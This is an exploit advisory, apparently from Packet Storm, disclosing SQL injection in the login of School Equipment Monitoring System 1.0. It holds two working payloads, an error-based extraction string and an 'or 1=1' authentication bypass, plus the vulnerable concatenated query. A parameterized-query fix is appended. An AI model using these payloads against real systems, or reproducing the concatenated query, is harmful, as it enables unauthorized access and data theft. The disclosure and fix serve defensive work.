packetstorm | Ihsan Sencan | PACKETSTORM:149996
History: Oct 29, 2018 - 12:00 a.m.

School Equipment Monitoring System 1.0 SQL Injection

2018-10-29 00:00:00
Ihsan Sencan
packetstormsecurity.com

EPSS: 0.003 (Low), percentile 68.2%

`# Exploit Title: School Equipment Monitoring System 1.0 - 'login' SQL Injection   
# Dork: N/A  
# Date: 2018-10-29  
# Exploit Author: Ihsan Sencan  
# Vendor Homepage: https://www.sourcecodester.com/users/janobe  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_0.zip  
# Version: 1.0  
# Category: Windows  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: CVE-2018-18806  
  
# POC:   
# 1)  
  
User: '||(SEleCT 'Efe' FRoM DuaL WheRE 113=113 AnD (SEleCT 64 FRom(SELeCT CoUNT(*),ConCAT(ConCAT(0x203a20,UsER(),DAtABAsE(),VErSIoN()),(SelEcT (ELT(64=64,1))),FLooR(RAnD(0)*2))x FrOM INFOrMATIoN_SchEMA.pLUGINS GroUP By x)a))||'  
Pass: Null  
  
# POC:   
# 2)  
# User: 'or 1=1 or ''='  
# Pass: Null  
#   
# https://4.bp.blogspot.com/-ILPqY1iygBY/W9YnEkjH9fI/AAAAAAAAENQ/34rcdTiwPDIeBzPhuj8roYPMIPOshiFvwCLcBGAs/s1600/sql2.png  
#   
#[PATH]/include/user.vb / 28 / '" & username & "'  
#....  
#24 Public Sub login(ByVal username As Object, ByVal pass As Object)  
#25 Try  
#26   
#27 con.Open()  
#28 reloadtxt("SELECT * FROM `tbluseraccounts` WHERE Username= '" & username & "' and Pass = sha1('" & pass & "')")  
#29   
#30   
#31 If dt.Rows.Count > 0 Then  
#32   
#33 If dt.Rows(0).Item("Role") = "Administrator" Then  
#34 MsgBox("Welcome " & dt.Rows(0).Item("Role"))  
#35 Form1.Text = "User :" & dt.Rows(0).Item("Fullname")  
#36 Form1.LogoutToolStripMenuItem.Text = "Logout"  
#37 visibleMenu("true", "admin")  
#38 LoginForm1.Close()  
#39 Else  
#40 visibleMenu("true", "not admin")  
#41 Form1.LogoutToolStripMenuItem.Text = "Logout"  
#42 LoginForm1.Close()  
#43 End If  
#44   
#45 Else  
#46 MsgBox("Acount doest not exits!", MsgBoxStyle.Information)  
#47 End If  
#48 Catch ex As Exception  
#49 MsgBox(ex.Message)  
#50 End Try  
#51 con.Close()  
#52 da.Dispose()  
#53 End Sub  
#....  
  
`
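A hardened form of the `login` lookup at line 28 above, added here as an example; it is not part of the original advisory or the vendor's code. It assumes the application reaches MySQL through Connector/NET (`MySql.Data`); `SafeLogin`, `FindAccount` and `TryLogin` are hypothetical names, while the table and column names are taken from the excerpt.

```vbnet
Imports System.Data
Imports System.Diagnostics
Imports MySql.Data.MySqlClient   ' assumption: MySQL Connector/NET is the driver in use

Public Module SafeLogin
    ' Hypothetical helper: fetches the matching account with bound parameters
    ' instead of concatenating username/pass into the SQL text (line 28).
    Public Function FindAccount(ByVal con As MySqlConnection,
                                ByVal username As String,
                                ByVal pass As String) As DataRow
        ' The statement text is a constant; user input never becomes part of it.
        Const sql As String =
            "SELECT `Role`, `Fullname` FROM `tbluseraccounts` " &
            "WHERE Username = @username AND Pass = SHA1(@pass) LIMIT 1"

        Dim dt As New DataTable()
        Using cmd As New MySqlCommand(sql, con)
            ' Values are sent as parameters, so quotes and SQL operators in the
            ' input are compared as literal characters, not parsed as SQL.
            cmd.Parameters.Add("@username", MySqlDbType.VarChar).Value = username
            cmd.Parameters.Add("@pass", MySqlDbType.VarChar).Value = pass
            Using da As New MySqlDataAdapter(cmd)
                da.Fill(dt)
            End Using
        End Using

        If dt.Rows.Count = 0 Then Return Nothing
        Return dt.Rows(0)
    End Function

    ' Hypothetical caller: returns the account row, or Nothing on any failure.
    Public Function TryLogin(ByVal con As MySqlConnection,
                             ByVal username As String,
                             ByVal pass As String) As DataRow
        Try
            con.Open()
            Return FindAccount(con, username, pass)
        Catch ex As MySqlException
            ' Keep database error text out of the UI; the original shows
            ' ex.Message in a MsgBox (line 49). Log it for the operator instead.
            Debug.WriteLine(ex.ToString())
            Return Nothing
        Finally
            con.Close()
        End Try
    End Function
End Module
```

With this form, both strings listed under POC 1 and POC 2 are treated as ordinary usernames that match no row, and a database error no longer reaches the login dialog.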
